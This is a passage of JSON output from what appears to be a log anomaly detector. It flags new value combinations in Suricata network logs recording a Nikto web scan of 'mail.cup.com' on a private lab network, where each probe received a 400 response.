"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.csp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.csp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.csp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46890, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1745783930633893,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1745783930633893, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.279049+0000\",\"flow_id\":1745783930633893,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.285211 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46892 -> 192.168.10.154:80", "/parser/model/time": 1583349514.285211, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46892, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.285211 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46892 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.koi8-r", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.285927+0000\",\"flow_id\":899997495875252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.285927, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":899997495875252,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.koi8-r\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.koi8-r\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.koi8-r", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.koi8-r", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46892, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":899997495875252,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 899997495875252, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.285927+0000\",\"flow_id\":899997495875252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.287568 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46894 -> 192.168.10.154:80", "/parser/model/time": 1583349514.287568, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46894, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.287568 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46894 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.mdb+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.287764+0000\",\"flow_id\":2181886319943873,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.287764, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2181886319943873,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.mdb+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.mdb+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.mdb+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.mdb+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": 
"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46894, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2181886319943873,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2181886319943873, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.287764+0000\",\"flow_id\":2181886319943873,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", 
"/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.294012 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46896 -> 192.168.10.154:80", "/parser/model/time": 1583349514.294012, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46896, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.294012 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46896 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], 
"AffectedLogAtomValues": [ "\\/bISn4adA.stm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.294206+0000\",\"flow_id\":2017848634013862,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.294206, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2017848634013862,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 